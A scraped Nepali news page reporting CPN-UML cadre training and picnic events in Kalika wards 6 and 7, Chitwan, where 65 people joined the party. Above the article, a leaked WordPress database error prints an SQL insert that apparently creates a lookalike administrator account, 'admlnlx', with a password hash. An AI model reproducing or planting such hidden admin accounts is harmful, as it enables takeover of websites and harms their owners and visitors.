WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi1xw0BwDuU0kbESFG/q58DufV8ZD.1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 01:47:52', '', 'admlnlx', 'admlnlx')
चितवन, माघ २२–
नेकपा एमाले कालिका वडा नं. ६ र ७ को आज शनिबार कार्यकर्ता प्रशिक्षण तथा वनभोज कार्यक्रम गरिएको छ ।
कालिका वडा नं. ७ का अध्यक्ष होमबहादुर गुरुङ्गको अध्यक्षतामा सगुनटोलमा भएको कार्यक्रमका प्रमुख अतिथि नेकपा एमालेका स्थायी कमिटी सदस्य एवम् पूर्व अर्थमन्त्री सांसद सुरेन्द्र पाण्डे रहेका थिए । सो कार्यक्रममा केन्द्रीय सल्लाहकार परिषद सदस्य देवी ज्ञवाली, नेकपा एमालेका क्षेत्रीय इन्चार्ज गोपी श्रेष्ठ, सचिवालय सदस्य विनोद रेग्मी, नेपाल टे«ड यूनियन महासंघ (जिफन्ट) का जिल्ला उपाध्यक्ष दिपक अधिकारी, वडा सचिव हरिप्रसाद दंगाल लगायतले मन्तव्य व्यक्त गरेका थिए ।
त्यसैगरी कालिका वडा नं. ६ को थानखोलामा सो कार्यक्रम भएको थियो । वडा अध्यक्ष चेतबहादुर थापाको अध्यक्षतामा भएको कार्यक्रममा नेकपा एमालेका केन्द्रीय सल्लाहकार परिषद सदस्य देवी ज्ञवाली प्रमुख अतिथि रहेका थिए । सो कार्यक्रममा क्षेत्रीय इन्चार्ज गोपी श्रेष्ठ, सचिवालय सदस्य विनोद रेग्मी, नगर कमिटीका अध्यक्ष भिष्म प्रसाद खनाल, नगर सचिवालय सदस्य केशव लामा, वडा उपाध्यक्ष वेद प्रसाद भेटवाल लगायतले मन्तव्य व्यक्त गरेका थिए । सोही भेलाले गीता विष्टको अध्यक्षतामा १५ सदस्यीय अखिल नेपाल महिला संघ वडा कमिटी समेत गठन गरिएको थियो । सो प्रशिक्षण कार्यक्रममा विभिन्न पार्टी परित्याग गरी ६५ जना नेकपा एमाले प्रवेश गरेका थिए ।